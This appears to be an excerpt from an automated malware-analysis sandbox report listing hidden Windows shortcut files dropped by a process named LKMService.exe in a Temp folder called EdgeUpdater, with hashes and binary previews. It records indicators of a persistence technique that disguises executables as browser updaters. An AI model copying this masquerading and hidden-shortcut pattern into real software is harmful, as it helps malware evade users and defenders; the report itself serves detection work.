                Preview:L..................F....".....X:3...`..P3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:01 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.933296001935866
                Encrypted:false
                SSDEEP:24:8MRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8aJD3lfAvRAt41vgHyg
                MD5:F95B5EA7F2290101EBA5A62AB73BEF1A
                SHA1:946BA22E5EBF7FEDD2577AC002D29AB764EF002E
                SHA-256:30DC35EC00DC8B043C9EA714952811B1922CF817BAFFD91B147D842C8C413C0D
                SHA-512:B4A8A9AA6DCC3D4F0A4917A765E6C70B46DB174C625C02B594DF4949DE6D818611D04A83A3E37873E26B778BC394D038B66F0AAE1B183B0AC35CCAE117626BCE
                Malicious:false
                Preview:L..................F....".....X:3....E.Y3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:12 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.943046682849563
                Encrypted:false
                SSDEEP:24:8URJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8SJD3lfAvRAt41vgHyg
                MD5:E25FB1598E83FB38BB935982BCCA1498
                SHA1:4F403941FD50D2C63B28C4304761754162A0BEC7
                SHA-256:989D2A37999D1EA6E1BCBDDD455336D1F83393BD51560AC7D7AAD13B2EEAB2A7
                SHA-512:11DFDD84243F4691AF35C1AED4B62D235DE4F0B56964038423331DF55D33DFC9D2DFD7A2B841E2EB5D5AC4ABCD648D1676DAD9F4E6899803663AFCE9206993E3
                Malicious:false
                Preview:L..................F....".....X:3....)_3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:07 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.9364377634237595
                Encrypted:false
                SSDEEP:24:8nRRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8nPJD3lfAvRAt41vgHyg
                MD5:4FAB0FB8EE6F8901226B6A87741DEB43
                SHA1:F6BCFC746DBBEE510881A3F898A404FFB96EAAE2
                SHA-256:2900F70A9180647D36F71F51B02A950E8446D9C159186F64F0D6C7B0901B4844
                SHA-512:359D503460B5DE2C883A7781F4AD10D9F4F9ABBC4135B784F946D63938A571A23688BEB9CEF40263DC792764026C602287DC5271C1C1847D649A336F2624C408
                Malicious:false
                Preview:L..................F....".....X:3...o..\3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:55 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.938289541052928
                Encrypted:false
                SSDEEP:24:8VcVRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8VuJD3lfAvRAt41vgHyg
                MD5:02F6A8C9AD3EEFC8A9AA7C4FF1538C7D
                SHA1:06EEFFABB1E600C2BAD490073C2F766E904899BB
                SHA-256:15E39329AFF4A21EF0876726141E2CDDD48F5C2E9BF36F25A93D5CC7283A6790
                SHA-512:BBCD968958B24EC222F3AEFA38010400A5AA7E561EC460818B968102BCF1E829E4B4EF8E631FA8B5CC2F052F2EF8FBE1DE084C37BF7CC9534B9538D22B2302CA
                Malicious:false
                Preview:L..................F....".....X:3...k.@U3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:31 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.937577286723054
                Encrypted:false
                SSDEEP:24:8aRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8sJD3lfAvRAt41vgHyg
                MD5:84AB3B638E3B3A5D8190402D16875747
                SHA1:8B45035AEE05672F9FF56DD8BEF1E866310A1F36
                SHA-256:BE117C562600CDC491AE46727142A3B549B8F96D901AFBDD5DDB8A3E04C41DDF
                SHA-512:6A68A515FC21544F488FCF7F497AE92086F400A6F3A58F6B7398731DD1BFD1137896F01A004CE2AB4B840194E5984FAD03D1C208712645039839E7EC8524ECAA
                Malicious:false
                Preview:L..................F....".....X:3....F.F3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:40 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.934255346712717
                Encrypted:false
                SSDEEP:24:8QRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8mJD3lfAvRAt41vgHyg
                MD5:5E2710EC0A835EDCD83B74E4EC9307F3
                SHA1:95816582215139366C61E0798674B6319EAA4A2A
                SHA-256:0A03CF988D17F550B82DB454347C6F68F10E7DD39EBF2FF70DAC0E40E8E7C9FE
                SHA-512:FE823D8444D43E5BB53A3701AE042073B640FB232319B0DF2BA13D05CEBDA8A00E834C435AD549E759C6BB899A497B80AD0AB3C2EC5B4F6EB44F90AE4F6FA11C
                Malicious:false
                Preview:L..................F....".....X:3.....lL3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:17 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.940727753975688
                Encrypted:false
                SSDEEP:24:8fVRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8zJD3lfAvRAt41vgHyg
                MD5:356C87E3CB9A224885F4A0CAA35C9940
                SHA1:B9BADBD13B2BCDDFBD0F10C18A151139966564F7
                SHA-256:6BFF19B80DC03CC9A308C8F7833A66634A1301640CD44D55A9BE2808F72E2379
                SHA-512:DD9FB9CECECE9519B7930FA9E9EA30F90A24F41DF672D19FB6DA72208CFCF39D8D8245F0DEA897CA8A41F7C68B873FCDA5B584DDF73E8154395B618A48A5527F
                Malicious:false
                Preview:L..................F....".....X:3.....f>3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:13 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.937689336067915
                Encrypted:false
                SSDEEP:24:8nhRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8fJD3lfAvRAt41vgHyg
                MD5:5ED8DB2584DC9D0921770713DC6E1965
                SHA1:E22492F6EFDA32AE1156D2B893889EB166772A7D
                SHA-256:BB3ECAEF89D94047B62DCA9FCAA8F9F0C2D00B16A4404D89182E62BDFA82B477
                SHA-512:DD94C50FD8AEC3B2189030439329974D8837AE373A5657A20DB5D0439CA12FF8966F9454E6FC6D441508298A8F422DEC79432343D262B2372EFEEE849CE0682F
                Malicious:false
                Preview:L..................F....".....X:3.../.._3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:36 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.936352962247597
                Encrypted:false
                SSDEEP:24:8DURJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8DSJD3lfAvRAt41vgHyg
                MD5:1AE524470AB51B70D1DFF433534FD72E
                SHA1:ABB1DD3FD9135D97EE80B43A3393DC1CC91CE573
                SHA-256:DE7B66DAC3865D96559A57D1DABD0FB7C9947B0691C73B4D1B89E3E2D1F7F452
                SHA-512:B9934DFC53A2E6023244097A000AEC0152934ED8731AFE33EE0FD06048EAC3E75A62B478C1C170952ACE0E3EBAC736DD0AD77A352F72AB8EA494E2372D8D051D
                Malicious:false
                Preview:L..................F....".....X:3...`F.I3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:37 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.938338241735561
                Encrypted:false
                SSDEEP:24:8ARJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8WJD3lfAvRAt41vgHyg
                MD5:C456C49CEE8C0B06AE12D22BC211B471
                SHA1:AE29C60B3E2A1A756B8B7C9AA54B03060DC6A279
                SHA-256:6C4B045AC75FEEC6F0409A8CE118966853C5844FEF4FC6F3D7544812272406A3
                SHA-512:2FDA9B71995C25D310AC2ABE226B7688E74E8544DA7D88CAFE8ABEAAB05C07661DE00AE73281674D7B1567949BDE6AF952F6AD49BD26F1AD07B399B967836BE7
                Malicious:false
                Preview:L..................F....".....X:3.....J3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:04 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.9424112556591915
                Encrypted:false
                SSDEEP:24:8rRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8dJD3lfAvRAt41vgHyg
                MD5:B0E2D74ECCEA78A3A7CE0C8AB203C74A
                SHA1:ED8816E8F0EDAE6BC41309F3C66AE2C3F028ED61
                SHA-256:42936B6224CA2BC564B81095F6F2431E9A973A859EAA6250A575CF4539F9324B
                SHA-512:CEB7E07176BC2DB921CB0F2212B8B03CFA50474B1EE2B97D7C17FD511B14341F4090347A2EBC0479293CFC5AE556C82D1F3745967095B177834E9E943A5390E0
                Malicious:false
                Preview:L..................F....".....X:3..../.Z3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:35 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.940268576767644
                Encrypted:false
                SSDEEP:24:8gRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:82JD3lfAvRAt41vgHyg
                MD5:3459F31E9031B69ACFE7F20F5C3CF8AE
                SHA1:8BDD7FC92026C4ED96BAAF05315472418690C0E6
                SHA-256:DADB1576E02BB3DB2E95A64B137CAD470D074A278640D7A1CAE30C2D6A0DC42D
                SHA-512:46CF070A651F07C1655FEAAD734C013D06498D06DBFD5C26CE8E1FCB8DF685869B2A2B85EE60CFFFDC43198F7D1CC6992D7C8D1739CE9FD0F2E73298EC4A2BFE
                Malicious:false
                Preview:L..................F....".....X:3...!.YI3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:11 2024, mtime=Thu Oct 3 00:26:11 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1203
                Entropy (8bit):4.904215973046557
                Encrypted:false
                SSDEEP:24:8Pb+VPJD3lXPXQvRXgK4KZyAksaUaPMvqygm:8PbAJD3lfAvRAiRoUa/yg
                MD5:F6309C5E9A173BBB73AA0F7409CDA4F5
                SHA1:B280A8E2220760C572D5D47255DDBF4ABC653A29
                SHA-256:60069743EBB192B415164AD408524FF367B937F5FB9974F8F5BD61F9D2F6E4C4
                SHA-512:76846A24AB5A57921BF5AAF0384E327134DC1BB367A4CA69E239D24958B96E3FDA94D1F6E4B7782E4023F1AAEEEB10977CF98ED0B6C8A1078608A43009918AA0
                Malicious:false
                Preview:L..................F...."....:3....:3...<..93...........................,.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...........................BS..E.d.g.e.U.p.d.a.t.e.r.....p.2.....CYE.".GOOGLE~1.EXE..T......CYF.CYF.....9.......................^.G.o.o.g.l.e.U.p.d.a.t.e.r...e.x.e.......q...............-.......p...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.G.o.o.g.l.e.U.p.d.a.t.e.r...e.x.e.........|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$............
                Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:42 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
                Category:dropped
                Size (bytes):1188
                Entropy (8bit):4.935778386624045
                Encrypted:false
                SSDEEP:24:8mRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8wJD3lfAvRAt41vgHyg
                MD5:F71284209B953A566472D6B57870F67E
                SHA1:5A9248ED7F6E06C11DF86746BC34D99DAF09EA38
                SHA-256:794E4E65F41AFFD34765F94BC7AAA92BEBF88AEE52B2729F0DDA952C4A25DB4D
                SHA-512:1E1A906CA8ACD8443370CC6359FEFD310683EF1A5DB69853863A946946C7ADDB1AF546D11DF3C0BAC83B7B38FA77D132C618904BF21B9DE376A7356256ADBB83
                Malicious:false
